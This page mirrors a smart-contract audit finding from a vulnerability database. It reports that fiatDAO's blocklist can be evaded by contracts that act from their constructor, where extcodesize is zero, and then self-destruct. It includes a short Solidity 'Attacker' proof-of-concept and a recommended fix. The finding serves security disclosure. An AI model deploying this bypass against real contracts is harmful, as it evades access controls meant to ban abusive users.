Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
code423n4Code4renaCODE423N4:2022-08-FIATDAO-FINDINGS-ISSUES-168
HistoryAug 15, 2022 - 12:00 a.m.

Users can create an un-bannable contract

2022-08-1500:00:00
Code4rena
github.com
5
JSON

Lines of code
<https://github.com/code-423n4/2022-08-fiatdao/blob/fece3bdb79ccacb501099c24b60312cd0b2e4bb2/contracts/features/Blocklist.sol#L23&gt;

Vulnerability details

Impact

Users can create an un-bannable contract by working from a contract’s constructor and then self-destructing on each instantiation.
Users can also deterministically deploy the contract to the same address every time they want to interact with fiatDAO contracts by using the create2 function to deploy.

Please always remember that contracts calling external functions from their constructor always have a 0 extcodesize, which _isContract relies on.

Proof of Concept

Example of a contract that could never be banned (because extcodesize is always 0 for this contract);
we can deterministically deploy this contract to same address using create2 and make arbitrary calls to fiatDAO:

contract Attacker {    
    constructor(address addrs, bytes[] memory callDatas) {
        for (uint i; i &lt; callDatas.length; i++) {
            addrs.call(callDatas[i]);
        }

        selfdestruct(payable(msg.sender));
    }
}

Tools Used

solidity

Recommended Mitigation Steps

I recommend allowing the blocklist to ban all types of addresses, you really can’t control how users prepare their malicious smart contracts. The isContract check is kind of an arbitrary guard that users can get around.

The text was updated successfully, but these errors were encountered:

All reactions

JSON